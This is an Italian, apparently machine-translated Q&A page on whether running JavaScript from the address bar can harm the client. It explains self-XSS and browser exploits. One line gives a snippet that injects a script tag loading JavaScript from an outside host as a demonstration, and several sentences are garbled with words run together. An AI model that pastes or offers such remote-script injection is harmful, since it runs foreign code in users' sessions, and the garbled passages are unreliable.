Dato che oggigiorno i moderni browser proibiscono a JavaScript di accedere a qualsiasi risorsa sul computer del client, l'esecuzione di JavaScript dalla barra degli indirizzi rappresenta una minaccia per la macchina del client (la macchina su cui è in esecuzione il browser)?
Il JavaScript eseguito dalla barra degli indirizzi verrà eseguito nel contesto del sito Web visualizzato in tale scheda. Ciò significa l'accesso completo a quel sito Web e potrebbe cambiare il modo in cui il sito web si presenta e si comporta dal punto di vista dell'utente.
Questo attacco si chiama auto XSS e può causare danni all'utente e indirettamente alla macchina. Un sito Web affidabile può chiedere all'utente di scaricare e installare un codice malizioso di codice eseguibile fingendo, ad esempio, di aver bisogno di un aggiornamento Flash.
Per ottenere un bell'esempio visivo di questo, digita manualmente javascript: nella barra degli indirizzi e poi incolla questo:
z=document.createElement("script");z.src="https://peniscorp.com/topkek.js";document.body.appendChild(z);Senontifididime,fallonellabarradegliindirizzidiunsitowebincuinonhaieffettuatol'accesso.
Lamaggiorpartedeibrowserhajavascript: quando incollare javascript:some_js_code nella barra degli indirizzi. Ma è ancora possibile scriverlo manualmente ed eseguirlo.
Vorrei completare la risposta accettata di Cristian Dobre, che è corretta ma incompleta.
L'esecuzione di javascript (indipendentemente dal fatto che si tratti di una barra degli indirizzi o di altri mezzi classici non importa qui) può, in alcuni casi, portare all'esecuzione di codice remoto sfruttando buffer overflow (o difetti simili) nei browser. Questo è uno dei motivi per cui patchare regolarmente i browser è piuttosto importante.
Tali occorrenze sono raramente scoperte in natura ma esistono e ne vengono scoperte di nuove ogni anno (Chrome ha meno di Firefox che ha MODO MENO di IE, in passato).
Un buon esempio qui su SO: link
Quindi, per rispondere alla tua domanda: sì, può danneggiare la macchina di un cliente. Se la macchina è completamente rattoppata, solo un giorno zero (estremamente improbabile ma ancora tecnicamente possibile) potrebbe causare tali danni. Zero-giorni con tale potere sono per lo più, "per fortuna", utilizzati per attacchi mirati per evitare l'attenzione e massimizzare le possibilità di non rilevamento (e, quindi, riutilizzo futuro).
Leggi altre domande sui tag javascript web-browser url